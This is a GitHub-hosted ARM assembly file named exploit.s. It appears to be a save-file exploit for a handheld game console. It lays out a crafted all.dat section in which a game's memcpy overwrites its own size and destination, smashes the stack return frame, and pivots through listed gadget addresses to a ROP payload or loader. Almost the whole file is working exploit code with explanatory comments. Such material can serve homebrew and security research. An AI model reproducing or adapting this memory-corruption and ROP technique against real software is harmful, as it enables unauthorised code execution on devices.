-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.s
43 lines (40 loc) · 2 KB
/
exploit.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
.arm
.text
#include "defines_pika.h"
#define GARBAGE 0xdeadb0b0
#define MEMCPY_BLOCKS 1
#define MEMCPY_SIZE (frame_top-frame_bottom)
#define MEMCPY_ITERATIONS 2
#define MEMCPY_DEST (0x0fffff50 - MEMCPY_SIZE)
#define PAYLOAD_ADDR 0x003449c0
#define STACK_PIVOT 0x001C2C1C //stack pivot gadget (mov r1,r4; mov r0,r5; blx r8 --SP_LINK--> mov sp,r0; blx r1)
#define PIVOT_SP PAYLOAD_ADDR
#define PIVOT_PC ROP_POPPC
#define SP_LINK 0x0014ce58
.global _start
@---------------------------------------------------------------------------------
_start:
@ Copy everything here to all.dat + 0x1010
@ Save file exploit setup data - everything between _start and frame_bottom sets up the memcpy of the exploit frame (frame_bottom -- frame_top)
.word MEMCPY_BLOCKS @ all.dat has 5 identical sections of some unknown game data that the memcpy exploit works on, we choose only the 1st.
.word GARBAGE @ ???
.word MEMCPY_SIZE @ Just enough to copy the below crafted frame to overwrite the current function's return frame
.word MEMCPY_ITERATIONS @ First iteration memcpy copies over the next iteration memcpy's dest and size data, this is the exploit
.word GARBAGE @ Next 5 words are game data we don't care about
.word GARBAGE @
.word GARBAGE @
.word GARBAGE @
.word GARBAGE @
frame_bottom: @ Exploit frame - everything beyond here will be copied to the stack. upon the current function's return, it will pivot the stack to our rop payload (payload.s, or otherapp loader)
.word MEMCPY_DEST @ MEMCPY_DEST is not needed in the frame but its still copied to the stack with the other data - no choice here
.word PIVOT_PC @ r4 - NewStackPC
.word PIVOT_SP @ r5 - NewStackSP
.word GARBAGE @ r6
.word GARBAGE @ r7
.word SP_LINK @ r8 - Connecting jump between 2 pivot gadgets - post exploitation, it can be its own stack pivot
.word GARBAGE @ r9
.word GARBAGE @ r10
.word GARBAGE @ r11
.word STACK_PIVOT @ pc
frame_top:
@---------------------------------------------------------------------------------